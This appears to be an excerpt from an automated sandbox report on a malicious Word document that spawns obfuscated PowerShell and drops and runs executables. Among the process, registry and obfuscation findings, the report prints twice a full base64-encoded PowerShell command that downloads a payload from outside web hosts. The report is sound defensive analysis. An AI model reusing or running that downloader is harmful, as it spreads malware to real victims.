Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v....."......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.....#..............................}..v.....$......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v.....*......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.....+..............................}..v.....,......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............%7.j.....Mg.............................}..v.....2......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'................4.j.....3..............................}..v.....4......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............%7.j.....Mg.............................}..v.....:......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3................4.j.....;..............................}..v.....<......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............%7.j.....Mg.............................}..v.....B......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?................4.j.....C..............................}..v.....D......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............%7.j.....Mg.............................}..v.....J......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K................4.j.....K..............................}..v.....L......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............%7.j.....Mg.............................}..v.....R......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W................4.j.....S..............................}..v.....T......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............%7.j.....Mg.............................}..v.....Z......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c................4.j.....[..............................}..v.....\......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............%7.j.....Mg.............................}..v.....b......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o................4.j.....c..............................}..v.....d......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............%7.j.....Mg.............................}..v.....j......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{................4.j.....k..............................}..v.....l......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v.....r......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.....s..............................}..v.....t......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v.....z......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.....{..............................}..v.....|......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v....8.......0.......................b....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v....p.......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....................................}..v....P.......0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%7.j.....Mg.............................}..v............0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j....X...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......%7.j.....Mg.............................}..v....h.......0................Jg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................4.j.... ...............................}..v............0...............(Kg............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................e..j.... Q[.............................}..v.....5......0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.G.E.N.U.S. . . . . . . . . . .:. .2.........}..v....xI......0...............H.g.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....]...............................}..v.....J......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0..............._._.C.L.A.S.S. . . . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S... ...............H.g.....>....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....hP......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.S.U.P.E.R.C.L.A.S.S. . . . . .:. ...........}..v.....S......0...............H.g.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....T......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.D.Y.N.A.S.T.Y. . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...0...............H.g.....>....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....Z......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.R.E.L.P.A.T.H. . . . . . . . .:. ...........}..v....x^......0...............H.g.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....._......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. .:. .2.........}..v.....d......0...............H.g.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....e......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.D.E.R.I.V.A.T.I.O.N. . . . . .:. .{.}.......}..v.....j......0...............H.g.....*....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....(k......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.S.E.R.V.E.R. . . . . . . . . .:. ...........}..v.....n......0...............H.g.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....Po......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.N.A.M.E.S.P.A.C.E. . . . . . .:. ...........}..v.....r......0...............H.g.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v....xs......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.P.A.T.H. . . . . . . . . . . .:. ...........}..v.....w......0...............H.g.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....w......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............P.r.o.c.e.s.s.I.d. . . . . . . . .:. .2.5.4.8...}..v....@}......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v.....}......0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.........}..v....H.......0...............H.g.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............H.g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................e..j....9...............................}..v............0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%..j....E...............................}..v....(.......0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................%..j....E...............................}..v............0.................g............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: E_FUHKOEGDW.doc Virustotal: Detection: 53%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -ENCOD JABYAGkAYwB4AGMAeAA5AD0AKAAoACcARwA3ACcAKwAnAHkAJwApACsAKAAnADAAJwArACcAZgB2ADIAJwApACkAOwAkAE4AdQBvAGUAMABiADQAPQAkAEUAagA4ADYAdQBhAG0AIAArACAAWwBjAGgAYQByAF0AKAAxACAAKwAgADEAIAArACAAMgAwACAAKwAgADEAMAAgACsAIAAxADAAKQAgACsAIAAkAEkANwBuAHYAMABjAGQAOwAkAEkAOQBoADIAMABmADIAPQAoACgAJwBQACcAKwAnAHIAXwAzADYAbAAnACkAKwAnADYAJwApADsAWwBzAHkAcwB0AGUAbQAuAGkAbwAuAGQAaQByAGUAYwB0AG8AcgB5AF0AOgA6ACIAQwByAGAARQBgAEEAdABFAGAAZABJAFIARQBDAFQAbwBgAFIAWQAiACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAKAAnAHcATwAnACsAJwA1ACcAKQArACgAJwBXAHQAJwArACcAMgBpACcAKQArACgAJwB4ACcAKwAnAHQAagB3ACcAKQArACgAJwBPACcAKwAnADUASAAnACsAJwBwACcAKwAnADYAbQBrAGcAaQB3ACcAKQArACcATwA1ACcAKQAgAC0AYwByAGUAUABMAGEAYwBlACAAIAAoACcAdwAnACsAJwBPADUAJwApACwAWwBDAEgAQQByAF0AOQAyACkAKQA7ACQAUgAzAGYAYgBqAG8AOAA9ACgAKAAnAFgAbgAnACsAJwBsACcAKQArACgAJwBoAGsAbQAnACsAJwBsACcAKQApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAGMAYABVAFIASQB0AGAAeQBQAFIAYABvAFQATwBDAE8ATAAiACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgAiAFQAYABMAFMAMQAyACIAOwAkAFUAbAB4AGkAbgBhAGUAPQAoACgAJwBOACcAKwAnAHoAaQBjACcAKQArACgAJwBhAHUAJwArACcANgAnACkAKQA7ACQARgB2ADcAeQBfADQAcAAgAD0AIAAoACgAJwBBAHkAJwArACcAOAAnACkAKwAoACcAZwA5ACcAKwAnAGIAJwApACkAOwAkAFgAYQBrADUAdwA1AHUAPQAoACgAJwBIACcAKwAnAGcANQAwACcAKQArACcAdAB5ACcAKwAnAHgAJwApADsAJABSAHkAZQB0AHYAZgA1AD0AKAAnAEkAcwAnACsAKAAnAGwAJwArACcAZwB4ACcAKQArACcAcQBlACcAKQA7ACQAQwAwAGIAMwBvAGsAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwA2AHcAJwArACgAJwBsAFcAJwArACcAdAAyAGkAeAAnACkAKwAoACcAdABqADYAdwAnACsAJwBsAEgAcAAnACkAKwAnADYAJwArACgAJwBtAGsAJwArACcAZwBpACcAKQArACgAJwA2AHcAJwArACcAbAAnACkAKQAuACIAcgBlAFAAYABsAGEAYwBlACIAKAAoAFsAYwBoAEEAUgBdADUANAArAFsAYwBoAEEAUgBdADEAMQA5ACsAWwBjAGgAQQBSAF0AMQAwADgAKQAsACcAXAAnACkAKQArACQARgB2ADcAeQBfADQAcAArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFQAagAxAGgAYwBnAHMAPQAoACgAJwBZACcAKwAnADIAMAAnACkAKwAoACcAOAAnACsAJwBoAHcAbAAnACkAKQA7ACQATwBfAGUAMABsAGwAOQA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgBXAEUAYgBDAEwAaQBFAG4AdAA7ACQAVABmAGgAawBpADkAbAA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAOgAvAC8AdwAnACsAJwBpAHcAJwApACsAJwBpAGwAJwArACgAJwBkAGMAYQAnACsAJwByAGUALgBvAHIAZwAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBpAG4AYwBsAHUAZAAnACkAKwAnAGUAcwAnACsAJwAvACcAKwAnAFIAJwArACcAaQAnACsAJwAvACoAJwArACgAJwBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAoACcALwBnACcAKwAnAHkAYQBuAGQAJwArACcAYQByAGIAJwArACcAYQAnACsAJwByAC4AYwBvAG0AJwApACsAKAAnAC8ARQBEACcAKwAnAFUALwAnACkAKwAoACcAdwAnACsAJwBCAHUAJwApACsAKAAnAGIATAByAEIALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKwAnAC8AZwAnACsAJwBpAGEAbgBuACcAKwAnAGEAJwApACsAJwBzACcAKwAoACcAcAAnACsAJwBzAHkAYwBoAGkAJwApACsAKAAnAGMAcwB0AHUAJwArACcAZABpACcAKwAnAG8ALgBjAG8AJwApACsAKAAnAG0ALwBjACcAKwAnAGcAJwApACsAKAAnAGkAJwArACcALQBiACcAKQArACgAJwBpAG4AJwArACcALwBBAEEASAAnACkAKwAoACcAcgAvACcAKwAn
Source: unknown Process created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe
Source: unknown Process created: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe C:\Windows\SysWOW64\mfh264enc\wfapigp.exe
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Process created: C:\Windows\SysWOW64\mfh264enc\wfapigp.exe C:\Windows\SysWOW64\mfh264enc\wfapigp.exe Jump to behavior
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -ENCOD JABYAGkAYwB4AGMAeAA5AD0AKAAoACcARwA3ACcAKwAnAHkAJwApACsAKAAnADAAJwArACcAZgB2ADIAJwApACkAOwAkAE4AdQBvAGUAMABiADQAPQAkAEUAagA4ADYAdQBhAG0AIAArACAAWwBjAGgAYQByAF0AKAAxACAAKwAgADEAIAArACAAMgAwACAAKwAgADEAMAAgACsAIAAxADAAKQAgACsAIAAkAEkANwBuAHYAMABjAGQAOwAkAEkAOQBoADIAMABmADIAPQAoACgAJwBQACcAKwAnAHIAXwAzADYAbAAnACkAKwAnADYAJwApADsAWwBzAHkAcwB0AGUAbQAuAGkAbwAuAGQAaQByAGUAYwB0AG8AcgB5AF0AOgA6ACIAQwByAGAARQBgAEEAdABFAGAAZABJAFIARQBDAFQAbwBgAFIAWQAiACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAKAAnAHcATwAnACsAJwA1ACcAKQArACgAJwBXAHQAJwArACcAMgBpACcAKQArACgAJwB4ACcAKwAnAHQAagB3ACcAKQArACgAJwBPACcAKwAnADUASAAnACsAJwBwACcAKwAnADYAbQBrAGcAaQB3ACcAKQArACcATwA1ACcAKQAgAC0AYwByAGUAUABMAGEAYwBlACAAIAAoACcAdwAnACsAJwBPADUAJwApACwAWwBDAEgAQQByAF0AOQAyACkAKQA7ACQAUgAzAGYAYgBqAG8AOAA9ACgAKAAnAFgAbgAnACsAJwBsACcAKQArACgAJwBoAGsAbQAnACsAJwBsACcAKQApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAGMAYABVAFIASQB0AGAAeQBQAFIAYABvAFQATwBDAE8ATAAiACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgAiAFQAYABMAFMAMQAyACIAOwAkAFUAbAB4AGkAbgBhAGUAPQAoACgAJwBOACcAKwAnAHoAaQBjACcAKQArACgAJwBhAHUAJwArACcANgAnACkAKQA7ACQARgB2ADcAeQBfADQAcAAgAD0AIAAoACgAJwBBAHkAJwArACcAOAAnACkAKwAoACcAZwA5ACcAKwAnAGIAJwApACkAOwAkAFgAYQBrADUAdwA1AHUAPQAoACgAJwBIACcAKwAnAGcANQAwACcAKQArACcAdAB5ACcAKwAnAHgAJwApADsAJABSAHkAZQB0AHYAZgA1AD0AKAAnAEkAcwAnACsAKAAnAGwAJwArACcAZwB4ACcAKQArACcAcQBlACcAKQA7ACQAQwAwAGIAMwBvAGsAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwA2AHcAJwArACgAJwBsAFcAJwArACcAdAAyAGkAeAAnACkAKwAoACcAdABqADYAdwAnACsAJwBsAEgAcAAnACkAKwAnADYAJwArACgAJwBtAGsAJwArACcAZwBpACcAKQArACgAJwA2AHcAJwArACcAbAAnACkAKQAuACIAcgBlAFAAYABsAGEAYwBlACIAKAAoAFsAYwBoAEEAUgBdADUANAArAFsAYwBoAEEAUgBdADEAMQA5ACsAWwBjAGgAQQBSAF0AMQAwADgAKQAsACcAXAAnACkAKQArACQARgB2ADcAeQBfADQAcAArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFQAagAxAGgAYwBnAHMAPQAoACgAJwBZACcAKwAnADIAMAAnACkAKwAoACcAOAAnACsAJwBoAHcAbAAnACkAKQA7ACQATwBfAGUAMABsAGwAOQA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgBXAEUAYgBDAEwAaQBFAG4AdAA7ACQAVABmAGgAawBpADkAbAA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAOgAvAC8AdwAnACsAJwBpAHcAJwApACsAJwBpAGwAJwArACgAJwBkAGMAYQAnACsAJwByAGUALgBvAHIAZwAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBpAG4AYwBsAHUAZAAnACkAKwAnAGUAcwAnACsAJwAvACcAKwAnAFIAJwArACcAaQAnACsAJwAvACoAJwArACgAJwBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAoACcALwBnACcAKwAnAHkAYQBuAGQAJwArACcAYQByAGIAJwArACcAYQAnACsAJwByAC4AYwBvAG0AJwApACsAKAAnAC8ARQBEACcAKwAnAFUALwAnACkAKwAoACcAdwAnACsAJwBCAHUAJwApACsAKAAnAGIATAByAEIALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKwAnAC8AZwAnACsAJwBpAGEAbgBuACcAKwAnAGEAJwApACsAJwBzACcAKwAoACcAcAAnACsAJwBzAHkAYwBoAGkAJwApACsAKAAnAGMAcwB0AHUAJwArACcAZABpACcAKwAnAG8ALgBjAG8AJwApACsAKAAnAG0ALwBjACcAKwAnAGcAJwApACsAKAAnAGkAJwArACcALQBiACcAKQArACgAJwBpAG4AJwArACcALwBBAEEASAAnACkAKwAoACcAcgAvACcAKwAn
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041BB07 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 4_2_0041BB07
PE file contains an invalid checksum
Source: Ay8g9b.exe.2.dr Static PE information: real checksum: 0x65db1 should be: 0x69c37
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00410CD6 push ecx; ret 4_2_00410CE9
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00410E05 push ecx; ret 4_2_00410E18
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5C40 push ecx; mov dword ptr [esp], 00004180h 4_2_003C5C41
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5CA0 push ecx; mov dword ptr [esp], 0000ECEBh 4_2_003C5CA1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5CF0 push ecx; mov dword ptr [esp], 0000DEB7h 4_2_003C5CF1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5D50 push ecx; mov dword ptr [esp], 000097F2h 4_2_003C5D51
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5DB0 push ecx; mov dword ptr [esp], 0000F636h 4_2_003C5DB1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E10 push ecx; mov dword ptr [esp], 0000AF8Ah 4_2_003C5E11
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E40 push ecx; mov dword ptr [esp], 00002B63h 4_2_003C5E41
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E80 push ecx; mov dword ptr [esp], 00002BE4h 4_2_003C5E81
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5EF0 push ecx; mov dword ptr [esp], 000066B1h 4_2_003C5EF1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5F50 push ecx; mov dword ptr [esp], 00000282h 4_2_003C5F51
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5F90 push ecx; mov dword ptr [esp], 0000765Fh 4_2_003C5F91
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027783E push ecx; mov dword ptr [esp], 0000ECEBh 4_2_0027783F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027788E push ecx; mov dword ptr [esp], 0000DEB7h 4_2_0027788F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002778EE push ecx; mov dword ptr [esp], 000097F2h 4_2_002778EF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027794E push ecx; mov dword ptr [esp], 0000F636h 4_2_0027794F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002779AE push ecx; mov dword ptr [esp], 0000AF8Ah 4_2_002779AF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002779DE push ecx; mov dword ptr [esp], 00002B63h 4_2_002779DF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00277A1E push ecx; mov dword ptr [esp], 00002BE4h 4_2_00277A1F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00277A8E push ecx; mov dword ptr [esp], 000066B1h 4_2_00277A8F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00277AEE push ecx; mov dword ptr [esp], 00000282h 4_2_00277AEF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00277B2E push ecx; mov dword ptr [esp], 0000765Fh 4_2_00277B2F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027DE1B push ecx; retf 4_2_0027DE30
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0027D6DB push ecx; retf 4_2_0027D6F0
